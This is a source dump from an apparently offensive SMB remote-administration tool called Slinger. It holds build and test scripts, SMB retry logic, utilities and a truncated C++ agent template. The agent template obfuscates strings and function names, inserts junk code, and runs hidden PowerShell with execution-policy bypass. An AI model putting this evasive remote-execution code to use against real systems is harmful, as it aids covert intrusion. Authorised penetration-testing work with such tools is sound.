data and test 110 | assert False, "Test not implemented" 111 | ''' 112 | 113 | 114 | def generate_test_stub(command_name: str, force: bool = False): 115 | """Generate test stub files for a command""" 116 | # Ensure we're in project root 117 | project_root = Path(__file__).parent.parent 118 | os.chdir(project_root) 119 | 120 | # Create test directories if they don't exist 121 | unit_test_dir = project_root / "tests" / "unit" 122 | integration_test_dir = project_root / "tests" / "integration" 123 | 124 | unit_test_dir.mkdir(parents=True, exist_ok=True) 125 | integration_test_dir.mkdir(parents=True, exist_ok=True) 126 | 127 | # Generate class name 128 | command_class = "".join(word.capitalize() for word in command_name.split("_")) 129 | 130 | # Generate unit test 131 | unit_test_file = unit_test_dir / f"test_{command_name}.py" 132 | if not unit_test_file.exists() or force: 133 | unit_test_content = UNIT_TEST_TEMPLATE.format( 134 | command=command_name, 135 | command_class=command_class, 136 | date=datetime.now().strftime("%Y-%m-%d"), 137 | ) 138 | unit_test_file.write_text(unit_test_content) 139 | print(f"✓ Generated unit test: {unit_test_file}") 140 | else: 141 | print(f"⚠ Unit test already exists: {unit_test_file}") 142 | 143 | # Generate integration test 144 | integration_test_file = integration_test_dir / f"test_{command_name}.py" 145 | if not integration_test_file.exists() or force: 146 | integration_test_content = INTEGRATION_TEST_TEMPLATE.format( 147 | command=command_name, 148 | command_class=command_class, 149 | date=datetime.now().strftime("%Y-%m-%d"), 150 | ) 151 | integration_test_file.write_text(integration_test_content) 152 | print(f"✓ Generated integration test: {integration_test_file}") 153 | else: 154 | print(f"⚠ Integration test already exists: {integration_test_file}") 155 | 156 | # Create __init__.py files if needed 157 | (unit_test_dir / "__init__.py").touch(exist_ok=True) 158 | (integration_test_dir / "__init__.py").touch(exist_ok=True) 159 | 160 | print(f"\nTest stubs generated for '{command_name}' command.") 161 | print("Please implement the TODO sections in the generated tests.") 162 | 163 | 164 | def main(): 165 | """Main entry point""" 166 | if len(sys.argv) < 2: 167 | print("Usage: generate_test_stub.py [--force]") 168 | print("Example: generate_test_stub.py ls") 169 | sys.exit(1) 170 | 171 | command_name = sys.argv[1] 172 | force = "--force" in sys.argv 173 | 174 | generate_test_stub(command_name, force) 175 | 176 | 177 | if __name__ == "__main__": 178 | main() 179 | -------------------------------------------------------------------------------- /scripts/check_cli_flags.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | CLI Flag Naming Standards Checker 4 | 5 | Checks that all CLI flags in the project adhere to the naming standard: 6 | - Single letter flags: Use single hyphen (e.g., -l, -v, -h) 7 | - Multi-letter flags: Use double hyphen (e.g., --list, --verbose, --help) 8 | 9 | Usage: 10 | python scripts/check_cli_flags.py 11 | python scripts/check_cli_flags.py --fix-suggestions 12 | """ 13 | 14 | import re 15 | import sys 16 | import ast 17 | import argparse 18 | from pathlib import Path 19 | from typing import List, Tuple, Optional 20 | 21 | 22 | def extract_add_argument_calls(file_path: Path) -> List[Tuple[str, int, str]]: 23 | """Extract all add_argument calls from a Python file""" 24 | try: 25 | with open(file_path, "r", encoding="utf-8") as f: 26 | content = f.read() 27 | 28 | tree = ast.parse(content) 29 | violations = [] 30 | 31 | for node in ast.walk(tree): 32 | if ( 33 | isinstance(node, ast.Call) 34 | and isinstance(node.func, ast.Attribute) 35 | and node.func.attr == "add_argument" 36 | ): 37 | 38 | # Get the first argument (the flag name) 39 | if node.args: 40 | arg = node.args[0] 41 | if isinstance(arg, ast.Str): 42 | flag_name = arg.s 43 | elif isinstance(arg, ast.Constant) and isinstance(arg.value, str): 44 | flag_name = arg.value 45 | else: 46 | continue 47 | 48 | # Check for violations 49 | violation = check_flag_standards(flag_name, node.lineno) 50 | if violation: 51 | violations.append((str(file_path), node.lineno, violation)) 52 | 53 | return violations 54 | except Exception as e: 55 | print(f"Warning: Error parsing {file_path}: {e}") 56 | return [] 57 | 58 | 59 | def check_flag_standards(flag_name: str, line_no: int) -> Optional[str]: 60 | """Check if flag name adheres to standards""" 61 | # Skip positional arguments (no hyphens) 62 | if not flag_name.startswith("-"): 63 | return None 64 | 65 | # Single letter flags should use single hyphen 66 | if len(flag_name) == 2 and flag_name.startswith("-") and not flag_name.startswith("--"): 67 | if flag_name[1].isalpha() or flag_name[1].isdigit(): 68 | return None # Correct: -l, -v, -1, etc. 69 | 70 | # Multi-letter flags should use double hyphen 71 | if len(flag_name) > 2 and flag_name.startswith("--"): 72 | return None # Correct: --list, --verbose, etc. 73 | 74 | # Check for violations 75 | 76 | # Single letter with double hyphen: --l 77 | if len(flag_name) == 3 and flag_name.startswith("--") and flag_name[2].isalnum(): 78 | return f'Single letter flag "{flag_name}" should use single hyphen: "-{flag_name[2]}"' 79 | 80 | # Multi-letter with single hyphen: -list 81 | elif len(flag_name) > 2 and flag_name.startswith("-") and not flag_name.startswith("--"): 82 | return f'Multi-letter flag "{flag_name}" should use double hyphen: "-{flag_name}"' 83 | 84 | return None 85 | 86 | 87 | def suggest_fix(flag_name: str) -> str: 88 | """Suggest a fix for a non-standard flag name""" 89 | if len(flag_name) == 3 and flag_name.startswith("--"): 90 | return f"-{flag_name[2:]}" 91 | elif len(flag_name) > 2 and flag_name.startswith("-") and not flag_name.startswith("--"): 92 | return f"-{flag_name}" 93 | return flag_name 94 | 95 | 96 | def main(): 97 | parser = argparse.ArgumentParser(description="Check CLI flag naming standards") 98 | parser.add_argument( 99 | "--fix-suggestions", action="store_true", help="Show suggested fixes for violations" 100 | ) 101 | parser.add_argument("--src-dir", default="src", help="Source directory to check (default: src)") 102 | args = parser.parse_args() 103 | 104 | # Check all Python files in src directory 105 | src_dir = Path(args.src_dir) 106 | all_violations = [] 107 | 108 | if not src_dir.exists(): 109 | print(f"❌ Source directory '{src_dir}' does not exist") 110 | sys.exit(1) 111 | 112 | print(f"🔍 Checking CLI flag standards in {src_dir}/...") 113 | print("=" * 60) 114 | print("Standard: Single letter flags use single hyphen (-l)") 115 | print(" Multi-letter flags use double hyphen (--list)") 116 | print("=" * 60) 117 | 118 | # Only check CLI-related files, exclude internal tools like secretsdump 119 | cli_files = [src_dir / "slingerpkg" / "utils" / "cli.py", src_dir / "slingerpkg" / "slinger.py"] 120 | 121 | for py_file in cli_files: 122 | if py_file.exists(): 123 | violations = extract_add_argument_calls(py_file) 124 | all_violations.extend(violations) 125 | else: 126 | print(f"Warning: CLI file not found: {py_file}") 127 | 128 | # Report violations 129 | if all_violations: 130 | print(f"❌ Found {len(all_violations)} CLI flag standard violation(s):") 131 | print() 132 | 133 | current_file = None 134 | for file_path, line_no, violation in sorted(all_violations): 135 | if file_path != current_file: 136 | print(f"📁 {file_path}") 137 | current_file = file_path 138 | 139 | print(f" Line {line_no}: {violation}") 140 | 141 | if args.fix_suggestions: 142 | # Extract the flag name from the violation message 143 | import re 144 | 145 | flag_match = re.search(r'"([^"]*)"', violation) 146 | if flag_match: 147 | flag_name = flag_match.group(1) 148 | suggested_fix = suggest_fix(flag_name) 149 | print(f" 💡 Suggested fix: {suggested_fix}") 150 | print() 151 | 152 | print("=" * 60) 153 | print(f"Total violations: {len(all_violations)}") 154 | print() 155 | print("Common patterns to fix:") 156 | print(" ❌ --l, --v, --h → ✅ -l, -v, -h") 157 | print(" ❌ -list, -verbose → ✅ --list, --verbose") 158 | print(" ❌ -output-file → ✅ --output-file") 159 | 160 | sys.exit(1) 161 | else: 162 | print("✅ All CLI flags adhere to naming standards!") 163 | print(f" Checked {len([f for f in cli_files if f.exists()])} CLI files") 164 | 165 | 166 | if __name__ == "__main__": 167 | main() 168 | -------------------------------------------------------------------------------- /scripts/install_agent_deps.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Post-installation script for Slinger cooperative agent dependencies 4 | Run this after installing Slinger with pipx to set up agent build requirements 5 | """ 6 | 7 | import subprocess 8 | import sys 9 | import platform 10 | import shutil 11 | 12 | 13 | def run_command(cmd, shell=False): 14 | """Run a command and return success status""" 15 | try: 16 | result = subprocess.run(cmd, shell=shell, capture_output=True, text=True) 17 | return result.returncode == 0, result.stdout, result.stderr 18 | except Exception as e: 19 | return False, "", str(e) 20 | 21 | 22 | def check_dependency(command): 23 | """Check if a command exists""" 24 | return shutil.which(command) is not None 25 | 26 | 27 | def install_dependencies(): 28 | """Install system dependencies based on platform""" 29 | system = platform.system().lower() 30 | 31 | print("🔧 Slinger Cooperative Agent Dependencies Installer") 32 | print("=" * 50) 33 | 34 | # Check current status 35 | cmake_available = check_dependency("cmake") 36 | gcc_available = check_dependency("gcc") or check_dependency("g++") 37 | 38 | print(f"Current status:") 39 | print(f" CMake: {'✓ Available' if cmake_available else '✗ Not found'}") 40 | print(f" C++ Compiler: {'✓ Available' if gcc_available else '✗ Not found'}") 41 | print() 42 | 43 | if cmake_available and gcc_available: 44 | print("✅ All dependencies are already installed!") 45 | print("You can now use: slinger agent build") 46 | return True 47 | 48 | print("Installing missing dependencies...") 49 | print() 50 | 51 | if system == "linux": 52 | # Detect Linux distribution 53 | try: 54 | with open("/etc/os-release") as f: 55 | os_info = f.read().lower() 56 | except: 57 | os_info = "" 58 | 59 | if "ubuntu" in os_info or "debian" in os_info: 60 | print("📦 Detected Ubuntu/Debian - installing via apt...") 61 | print("Running: sudo apt update && sudo apt install -y cmake build-essential") 62 | 63 | # Update package list 64 | success, stdout, stderr = run_command(["sudo", "apt", "update"]) 65 | if not success: 66 | print(f"❌ Failed to update package list: {stderr}") 67 | return False 68 | 69 | # Install packages 70 | success, stdout, stderr = run_command( 71 | ["sudo", "apt", "install", "-y", "cmake", "build-essential"] 72 | ) 73 | if not success: 74 | print(f"❌ Failed to install packages: {stderr}") 75 | return False 76 | 77 | elif "centos" in os_info or "rhel" in os_info or "fedora" in os_info: 78 | print("📦 Detected CentOS/RHEL/Fedora - installing via yum/dnf...") 79 | 80 | # Try dnf first, fallback to yum 81 | pkg_manager = "dnf" if check_dependency("dnf") else "yum" 82 | 83 | print(f"Running: sudo {pkg_manager} groupinstall -y 'Development Tools'") 84 | success, stdout, stderr = run_command( 85 | ["sudo", pkg_manager, "groupinstall", "-y", "Development Tools"] 86 | ) 87 | if not success: 88 | print(f"❌ Failed to install Development Tools: {stderr}") 89 | return False 90 | 91 | print(f"Running: sudo {pkg_manager} install -y cmake") 92 | success, stdout, stderr = run_command(["sudo", pkg_manager, "install", "-y", "cmake"]) 93 | if not success: 94 | print(f"❌ Failed to install CMake: {stderr}") 95 | return False 96 | 97 | else: 98 | print("⚠️ Unknown Linux distribution. Please install manually:") 99 | print(" - CMake: https://cmake.org/download/") 100 | print(" - C++ compiler (gcc/g++)") 101 | return False 102 | 103 | elif system == "darwin": # macOS 104 | print("📦 Detected macOS - checking for Homebrew...") 105 | 106 | if not check_dependency("brew"): 107 | print("❌ Homebrew not found. Please install Homebrew first:") 108 | print( 109 | ' /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"' 110 | ) 111 | return False 112 | 113 | print("Running: brew install cmake") 114 | success, stdout, stderr = run_command(["brew", "install", "cmake"]) 115 | if not success: 116 | print(f"❌ Failed to install CMake via Homebrew: {stderr}") 117 | return False 118 | 119 | elif system == "windows": 120 | print("🪟 Detected Windows") 121 | print("Please install dependencies manually:") 122 | print(" 1. Download CMake from: https://cmake.org/download/") 123 | print(" 2. Install Visual Studio Build Tools or Visual Studio Community") 124 | print(" https://visualstudio.microsoft.com/downloads/") 125 | print() 126 | print("Alternative: Install via Chocolatey:") 127 | print(" choco install cmake visualstudio2022buildtools") 128 | return False 129 | 130 | else: 131 | print(f"⚠️ Unsupported platform: {system}") 132 | return False 133 | 134 | # Verify installation 135 | print("\n🔍 Verifying installation...") 136 | cmake_available = check_dependency("cmake") 137 | gcc_available = check_dependency("gcc") or check_dependency("g++") 138 | 139 | print(f" CMake: {'✓ Available' if cmake_available else '✗ Still not found'}") 140 | print(f" C++ Compiler: {'✓ Available' if gcc_available else '✗ Still not found'}") 141 | 142 | if cmake_available and gcc_available: 143 | print("\n✅ All dependencies installed successfully!") 144 | print("You can now use: slinger agent build") 145 | return True 146 | else: 147 | print("\n❌ Some dependencies are still missing. Please install manually.") 148 | return False 149 | 150 | 151 | def main(): 152 | """Main installation function""" 153 | try: 154 | success = install_dependencies() 155 | 156 | if success: 157 | print("\n🚀 Test your installation:") 158 | print(" slinger agent info") 159 | print(" slinger agent build --dry-run") 160 | sys.exit(0) 161 | else: 162 | print("\n📖 For manual installation instructions, see:") 163 | print(" https://github.com/ghost-ng/slinger#agent-dependencies") 164 | sys.exit(1) 165 | 166 | except KeyboardInterrupt: 167 | print("\n\n⚠️ Installation cancelled by user.") 168 | sys.exit(1) 169 | except Exception as e: 170 | print(f"\n❌ Unexpected error: {e}") 171 | sys.exit(1) 172 | 173 | 174 | if __name__ == "__main__": 175 | main() 176 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/error_recovery.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Basic Error Recovery for Resume Downloads 4 | 5 | This module provides basic error recovery and retry logic for download operations. 6 | """ 7 | 8 | import time 9 | import random 10 | from enum import Enum 11 | from typing import Optional 12 | 13 | from slingerpkg.utils.printlib import print_debug, print_warning, print_info 14 | 15 | 16 | class RetryableError(Exception): 17 | """Exception for errors that can be retried""" 18 | 19 | def __init__(self, message, retry_delay=1.0): 20 | super().__init__(message) 21 | self.retry_delay = retry_delay 22 | 23 | 24 | class FatalError(Exception): 25 | """Exception for errors that cannot be retried""" 26 | 27 | pass 28 | 29 | 30 | def classify_smb_error(error_message: str) -> bool: 31 | """ 32 | Classify SMB error to determine if it's retryable. 33 | 34 | Args: 35 | error_message: The error message to classify 36 | 37 | Returns: 38 | True if retryable, False if fatal 39 | """ 40 | error_msg_lower = error_message.lower() 41 | 42 | # Retryable errors 43 | retryable_patterns = [ 44 | "timeout", 45 | "timed out", 46 | "connection timeout", 47 | "connection reset", 48 | "connection lost", 49 | "broken pipe", 50 | "network is unreachable", 51 | "no route to host", 52 | "status_invalid_smb", 53 | "status_smb_bad_tid", 54 | "status_invalid_handle", 55 | "status_network_name_deleted", 56 | "too busy", 57 | "server busy", 58 | "status_too_many_connections", 59 | ] 60 | 61 | # Fatal errors 62 | fatal_patterns = [ 63 | "status_object_name_not_found", 64 | "file not found", 65 | "status_access_denied", 66 | "access denied", 67 | "permission denied", 68 | "no space left", 69 | "disk full", 70 | "status_disk_full", 71 | "file size changed", 72 | "file modified", 73 | "checksum mismatch", 74 | ] 75 | 76 | # Check for fatal errors first 77 | for pattern in fatal_patterns: 78 | if pattern in error_msg_lower: 79 | return False 80 | 81 | # Check for retryable errors 82 | for pattern in retryable_patterns: 83 | if pattern in error_msg_lower: 84 | return True 85 | 86 | # Unknown errors are treated as retryable (optimistic approach) 87 | return True 88 | 89 | 90 | class SimpleRetryManager: 91 | """ 92 | Simple retry manager with exponential backoff for download operations. 93 | """ 94 | 95 | def __init__(self, max_retries: int = 3, base_delay: float = 1.0, max_delay: float = 30.0): 96 | self.max_retries = max_retries 97 | self.base_delay = base_delay 98 | self.max_delay = max_delay 99 | 100 | def get_retry_delay(self, attempt: int) -> float: 101 | """Calculate retry delay with exponential backoff and jitter""" 102 | if attempt <= 0: 103 | return 0 104 | 105 | # Exponential backoff: 1s, 2s, 4s, 8s, etc. 106 | delay = self.base_delay * (2 ** (attempt - 1)) 107 | delay = min(delay, self.max_delay) 108 | 109 | # Add 10% jitter to prevent thundering herd 110 | jitter = delay * 0.1 * random.uniform(-1, 1) 111 | return max(0, delay + jitter) 112 | 113 | def should_retry(self, error_message: str, attempt: int) -> bool: 114 | """Determine if operation should be retried""" 115 | if attempt >= self.max_retries: 116 | return False 117 | 118 | return classify_smb_error(error_message) 119 | 120 | def execute_with_retry(self, operation, *args, **kwargs): 121 | """ 122 | Execute operation with retry logic. 123 | 124 | Args: 125 | operation: Function to execute 126 | *args, **kwargs: Arguments for the operation 127 | 128 | Returns: 129 | Operation result or raises final exception 130 | """ 131 | last_error = None 132 | 133 | for attempt in range(self.max_retries + 1): 134 | try: 135 | return operation(*args, **kwargs) 136 | 137 | except Exception as e: 138 | last_error = e 139 | error_msg = str(e) 140 | 141 | if not self.should_retry(error_msg, attempt): 142 | print_debug(f"Error not retryable: {error_msg}") 143 | break 144 | 145 | if attempt < self.max_retries: 146 | delay = self.get_retry_delay(attempt + 1) 147 | print_warning( 148 | f"Operation failed (attempt {attempt + 1}/{self.max_retries + 1}): {error_msg}" 149 | ) 150 | print_info(f"Retrying in {delay:.1f} seconds...") 151 | time.sleep(delay) 152 | else: 153 | print_warning(f"Final attempt failed: {error_msg}") 154 | 155 | # All retries exhausted 156 | raise last_error 157 | 158 | 159 | def with_basic_retry(max_retries: int = 3): 160 | """ 161 | Decorator for adding basic retry logic to methods. 162 | 163 | Usage: 164 | @with_basic_retry(max_retries=3) 165 | def download_chunk(self, remote_path, offset, chunk_size): 166 | # Method implementation 167 | """ 168 | 169 | def decorator(func): 170 | def wrapper(*args, **kwargs): 171 | retry_manager = SimpleRetryManager(max_retries=max_retries) 172 | return retry_manager.execute_with_retry(func, *args, **kwargs) 173 | 174 | return wrapper 175 | 176 | return decorator 177 | 178 | 179 | # Utility functions for connection recovery 180 | def reconnect_smb_with_retry(connection_factory, max_attempts: int = 3): 181 | """ 182 | Attempt to reconnect SMB connection with retry logic. 183 | 184 | Args: 185 | connection_factory: Function that creates a new SMB connection 186 | max_attempts: Maximum reconnection attempts 187 | 188 | Returns: 189 | New connection or None if failed 190 | """ 191 | for attempt in range(max_attempts): 192 | try: 193 | print_info(f"Attempting SMB reconnection (attempt {attempt + 1}/{max_attempts})...") 194 | connection = connection_factory() 195 | if connection: 196 | print_info("SMB connection re-established successfully") 197 | return connection 198 | except Exception as e: 199 | error_msg = str(e) 200 | print_warning(f"Reconnection attempt {attempt + 1} failed: {error_msg}") 201 | 202 | if attempt < max_attempts - 1: 203 | delay = 2**attempt # 1s, 2s, 4s 204 | print_info(f"Waiting {delay}s before next attempt...") 205 | time.sleep(delay) 206 | 207 | print_warning("Failed to re-establish SMB connection after all attempts") 208 | return None 209 | 210 | 211 | def validate_chunk_integrity(chunk_data: bytes, expected_size: int) -> bool: 212 | """ 213 | Basic validation of downloaded chunk data. 214 | 215 | Args: 216 | chunk_data: Downloaded chunk bytes 217 | expected_size: Expected chunk size 218 | 219 | Returns: 220 | True if chunk appears valid 221 | """ 222 | if chunk_data is None: 223 | return False 224 | 225 | if len(chunk_data) > expected_size: 226 | print_warning(f"Chunk size larger than expected: {len(chunk_data)} > {expected_size}") 227 | return False 228 | 229 | # Basic validation passed 230 | return True 231 | -------------------------------------------------------------------------------- /src/slingerpkg/utils/common.py: -------------------------------------------------------------------------------- 1 | import string 2 | import subprocess 3 | import random 4 | import datetime 5 | import xml.etree.ElementTree as ET 6 | import re 7 | from impacket.dcerpc.v5 import rrp, srvs, wkst, tsch, scmr, even, even6 8 | from impacket.dcerpc.v5.dcom import wmi 9 | from slingerpkg.utils.printlib import * 10 | from slingerpkg.var.config import config_vars 11 | from tabulate import tabulate 12 | import sys 13 | from contextlib import contextmanager 14 | 15 | # dictionarty of UUID endpoints to plaintext names 16 | uuid_endpoints = { 17 | srvs.MSRPC_UUID_SRVS: "srvs", 18 | wkst.MSRPC_UUID_WKST: "wkst", 19 | tsch.MSRPC_UUID_TSCHS: "tsch", 20 | scmr.MSRPC_UUID_SCMR: "scmr", 21 | rrp.MSRPC_UUID_RRP: "rrp", 22 | even.MSRPC_UUID_EVEN: "even", 23 | even6.MSRPC_UUID_EVEN6: "even6", 24 | # WMI named pipe endpoints 25 | "8BC3F05E-D86B-11D0-A075-00C04FB68820": "wmi_level1", 26 | "44ACA674-E8FC-11D0-A07C-00C04FB68820": "wmi_level2", 27 | "027947E1-D731-11CE-A357-000000000001": "wmi_enumwbem", 28 | "423EC01E-2E35-11D2-B604-00104B703EFD": "wmi_services", 29 | } 30 | 31 | 32 | def convert_to_bool(value): 33 | # Define strings that should be interpreted as True 34 | true_values = {"t", "tr", "true", "yes", "y", "1"} 35 | 36 | # Check if the value is a string and convert it to lowercase for comparison 37 | if isinstance(value, str): 38 | value = value.lower() 39 | return value in true_values 40 | 41 | # For non-string values, use the standard bool conversion 42 | return bool(value) 43 | 44 | 45 | def reduce_slashes(paths): 46 | """ 47 | Reduces all consecutive backslashes in each string of the list to a single backslash. 48 | 49 | :param paths: List of strings with paths 50 | :return: List of strings with reduced backslashes 51 | """ 52 | if type(paths) is not list: 53 | return re.sub(r"\\+", r"\\", paths) 54 | if type(paths) is list: 55 | return [re.sub(r"\\+", r"\\", path) for path in paths] 56 | 57 | 58 | def sizeof_fmt(num, suffix="B"): 59 | for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]: 60 | if abs(num) < 1024.0: 61 | return "%3.1f%s%s" % (num, unit, suffix) 62 | num /= 1024.0 63 | return "%.1f%s%s" % (num, "Yi", suffix) 64 | 65 | 66 | def run_local_command(command): 67 | process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 68 | stdout, stderr = process.communicate() 69 | if stdout: 70 | print_log(stdout.decode()) 71 | if stderr: 72 | print_log(stderr.decode()) 73 | 74 | 75 | def remove_null_terminator(s): 76 | # Remove common null terminator patterns from the end of the string 77 | return re.sub(r"(\x00|\\0)$", "", s) 78 | 79 | 80 | def escape_single_backslashes(path): 81 | # Replace single backslashes with double backslashes, but not already doubled ones 82 | return re.sub(r"(?": ">", 141 | "<": "<", 142 | } 143 | return "".join(replace_table.get(c, c) for c in data) 144 | 145 | 146 | def generate_random_string(length=6, end=6): 147 | random.seed() 148 | # return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) 149 | return "".join( 150 | random.choices(string.ascii_letters + string.digits, k=random.randint(length, end)) 151 | ) 152 | 153 | 154 | def validate_xml(xml_string): 155 | try: 156 | ET.fromstring(xml_string) 157 | print_log("XML is valid") 158 | except ET.ParseError as e: 159 | print_log(e) 160 | return False 161 | 162 | 163 | def enter_interactive_debug_mode(local=None): 164 | import code 165 | import sys 166 | 167 | if local is None: 168 | local = {} 169 | 170 | # Combine globals and locals into one dictionary 171 | combined_scope = globals().copy() 172 | combined_scope.update(local) 173 | 174 | print_info("Entering interactive mode") 175 | 176 | # Save the original `sys.ps1` and `sys.stdout` 177 | original_ps1 = sys.ps1 if hasattr(sys, "ps1") else ">>> " 178 | original_stdout = sys.stdout 179 | 180 | class CustomStdout: 181 | def __init__(self, original_stdout): 182 | self.original_stdout = original_stdout 183 | 184 | def write(self, message): 185 | # Always write to stdout 186 | self.original_stdout.write(message) 187 | 188 | def flush(self): 189 | self.original_stdout.flush() 190 | 191 | def custom_exit(): 192 | print_warning("Invalid Exit Caught") 193 | 194 | # Add custom exit handlers to the local scope 195 | combined_scope["exit"] = custom_exit 196 | combined_scope["quit"] = custom_exit 197 | 198 | try: 199 | # Override `sys.ps1` to include the warning message 200 | sys.ps1 = f"\n{colors.WARNING}[!] Reminder: Use Ctrl-D to exit interactive mode.{colors.ENDC}\n{original_ps1}" 201 | 202 | # Replace stdout to ensure clean output 203 | sys.stdout = CustomStdout(original_stdout) 204 | 205 | # Start the interactive session 206 | code.interact( 207 | banner=f"\n{colors.HEADER}[*] Interactive Debug Mode Activated{colors.ENDC}", 208 | local=combined_scope, 209 | ) 210 | 211 | finally: 212 | # Restore the original settings 213 | sys.ps1 = original_ps1 214 | sys.stdout = original_stdout 215 | print_info("Exited interactive mode") 216 | 217 | 218 | def get_config_value(key): 219 | try: 220 | for c in config_vars: 221 | if c["Name"].lower() == key.lower(): 222 | return c["Value"] 223 | print_warning(f"Config variable '{key}' does not exist") 224 | except KeyError: 225 | print_warning(f"Config variable '{key}' does not exist") 226 | return 227 | 228 | 229 | # function to set a value in the config dictionary 230 | def set_config_value(key, value): 231 | try: 232 | for c in config_vars: 233 | if c["Name"].lower() == key.lower(): 234 | if c["Type"] == "bool": 235 | c["Value"] = convert_to_bool(value) 236 | elif c["Type"] == "int": 237 | try: 238 | c["Value"] = int(value) 239 | except ValueError: 240 | print_warning(f"Invalid value for '{key}', needs to be an integer") 241 | else: 242 | c["Value"] = value 243 | 244 | print_log(f"{key} --> {str(c['Value'])}") 245 | 246 | return 247 | print_warning(f"Config variable '{key}' does not exist") 248 | except KeyError: 249 | print_warning(f"Config variable '{key}' does not exist") 250 | return 251 | 252 | 253 | # function to display the current config 254 | def show_config(): 255 | # print the config in a tabulate table 256 | print_log( 257 | tabulate( 258 | [[c["Name"], c["Value"], c["Description"]] for c in config_vars], 259 | headers=["Name", "Value", "Description"], 260 | ) 261 | ) 262 | 263 | 264 | class TeeOutput: 265 | def __init__(self, filename): 266 | self.file = open(filename, "a") # Open file in append mode 267 | self.stdout = sys.stdout 268 | self.stderr = sys.stderr 269 | 270 | def write(self, data): 271 | self.stdout.write(data) # Write to the console 272 | self.file.write(data) # Write to the file 273 | 274 | def flush(self): 275 | self.stdout.flush() 276 | self.file.flush() 277 | 278 | def close(self): 279 | self.file.close() 280 | 281 | 282 | @contextmanager 283 | def tee_output(filename): 284 | if filename is None: 285 | yield 286 | return 287 | tee = TeeOutput(filename) 288 | sys.stdout = tee 289 | sys.stderr = tee 290 | try: 291 | yield 292 | finally: 293 | sys.stdout = tee.stdout 294 | sys.stderr = tee.stderr 295 | tee.close() 296 | -------------------------------------------------------------------------------- /lib/agent_templates/command_executor.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "obfuscation.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | // Cross-platform compatibility layer 10 | #ifdef _WIN32 11 | #include 12 | #else 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #ifndef PATH_MAX 20 | #define PATH_MAX 4096 21 | #endif 22 | #ifndef MAX_PATH 23 | #define MAX_PATH PATH_MAX 24 | #endif 25 | #endif 26 | 27 | namespace obf = obfuscated; 28 | 29 | // Obfuscated command strings (cross-platform) 30 | #ifdef _WIN32 31 | constexpr auto CMD_EXE = OBF_STRING("cmd.exe"); 32 | constexpr auto POWERSHELL_EXE = OBF_STRING("powershell.exe"); 33 | constexpr auto CMD_FLAG = OBF_STRING("/c"); 34 | constexpr auto PS_FLAGS = OBF_STRING("-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command"); 35 | #else 36 | constexpr auto CMD_EXE = OBF_STRING("/bin/sh"); 37 | constexpr auto POWERSHELL_EXE = OBF_STRING("/bin/bash"); 38 | constexpr auto CMD_FLAG = OBF_STRING("-c"); 39 | constexpr auto PS_FLAGS = OBF_STRING("-c"); 40 | #endif 41 | constexpr auto SUCCESS_PREFIX = OBF_STRING("[+] "); 42 | constexpr auto ERROR_PREFIX = OBF_STRING("[-] "); 43 | constexpr auto INFO_PREFIX = OBF_STRING("[*] "); 44 | 45 | class CommandExecutor { 46 | private: 47 | obf::XOREncoder encoder; 48 | 49 | // Obfuscated method names 50 | std::string OBF_FUNC_NAME(execute_cmd)(const std::string& command); 51 | std::string OBF_FUNC_NAME(execute_powershell)(const std::string& command); 52 | std::string OBF_FUNC_NAME(execute_with_createprocess)(const std::string& cmd_line); 53 | bool OBF_FUNC_NAME(is_powershell_command)(const std::string& command); 54 | std::string OBF_FUNC_NAME(sanitize_command)(const std::string& command); 55 | 56 | public: 57 | CommandExecutor(); 58 | ~CommandExecutor(); 59 | 60 | std::string execute(const std::string& command); 61 | std::string get_system_info(); 62 | std::string list_processes(); 63 | std::string get_current_directory(); 64 | bool change_directory(const std::string& path); 65 | }; 66 | 67 | // Implementation 68 | CommandExecutor::CommandExecutor() { 69 | obf::insert_junk_code(); 70 | } 71 | 72 | CommandExecutor::~CommandExecutor() { 73 | obf::insert_junk_code(); 74 | } 75 | 76 | bool CommandExecutor::OBF_FUNC_NAME(is_powershell_command)(const std::string& command) { 77 | std::string lower_cmd = command; 78 | std::transform(lower_cmd.begin(), lower_cmd.end(), lower_cmd.begin(), ::tolower); 79 | 80 | return lower_cmd.find("get-") == 0 || 81 | lower_cmd.find("set-") == 0 || 82 | lower_cmd.find("invoke-") == 0 || 83 | lower_cmd.find("new-") == 0 || 84 | lower_cmd.find("$") != std::string::npos; 85 | } 86 | 87 | std::string CommandExecutor::OBF_FUNC_NAME(sanitize_command)(const std::string& command) { 88 | // No sanitization - let cmd.exe handle command parsing 89 | // This allows legitimate redirection (>, <, |, &) and other shell features 90 | return command; 91 | } 92 | 93 | std::string CommandExecutor::OBF_FUNC_NAME(execute_with_createprocess)(const std::string& cmd_line) { 94 | obf::insert_junk_code(); 95 | 96 | #ifdef _WIN32 97 | SECURITY_ATTRIBUTES sa; 98 | sa.nLength = sizeof(SECURITY_ATTRIBUTES); 99 | sa.lpSecurityDescriptor = NULL; 100 | sa.bInheritHandle = TRUE; 101 | 102 | HANDLE hRead, hWrite; 103 | if (!CreatePipe(&hRead, &hWrite, &sa, 0)) { 104 | return ERROR_PREFIX.decrypt() + "Failed to create pipe"; 105 | } 106 | 107 | STARTUPINFOA si; 108 | PROCESS_INFORMATION pi; 109 | ZeroMemory(&si, sizeof(si)); 110 | ZeroMemory(&pi, sizeof(pi)); 111 | si.cb = sizeof(si); 112 | si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; 113 | si.hStdOutput = hWrite; 114 | si.hStdError = hWrite; 115 | si.wShowWindow = SW_HIDE; 116 | 117 | obf::StackString<512> command_line(cmd_line.c_str()); 118 | 119 | BOOL success = CreateProcessA( 120 | NULL, 121 | const_cast(command_line.c_str()), 122 | NULL, NULL, TRUE, CREATE_NO_WINDOW, 123 | NULL, NULL, &si, &pi 124 | ); 125 | 126 | CloseHandle(hWrite); 127 | 128 | if (!success) { 129 | CloseHandle(hRead); 130 | return 